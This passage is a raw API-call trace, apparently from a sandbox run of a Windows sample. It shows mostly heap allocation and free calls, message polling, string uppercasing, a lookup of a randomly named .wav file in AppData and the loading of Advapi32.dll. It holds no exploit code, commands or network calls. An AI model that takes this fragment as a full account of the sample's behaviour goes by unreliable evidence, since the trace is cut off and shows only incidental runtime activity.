RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0121.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0121.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77bc0 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0121.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0121.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0121.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0121.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.734] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bNDu1R0FYJg.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd69521b0, ftCreationTime.dwHighDateTime=0x1d5cc2d, ftLastAccessTime.dwLowDateTime=0x7b660ee0, ftLastAccessTime.dwHighDateTime=0x1d5d771, ftLastWriteTime.dwLowDateTime=0x7b660ee0, ftLastWriteTime.dwHighDateTime=0x1d5d771, nFileSizeHigh=0x0, nFileSizeLow=0x9ff1, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNDu1R0FYJg.wav", cAlternateFileName="BNDU1R~1.WAV")) returned 0x9a4a40 [0121.734] FindClose (in: hFindFile=0x9a4a40 | out: hFindFile=0x9a4a40) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0121.735] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0121.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0121.736] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa108 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0121.736] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0121.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0121.736] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0121.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0121.737] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0121.737] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0121.737] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fd0 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0121.737] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0121.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0121.737] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0121.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0121.738] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0121.738] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0121.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0121.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.739] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0121.739] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.739] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.739] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0121.739] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0121.740] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0121.740] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.740] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0121.740] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0121.740] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0121.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: 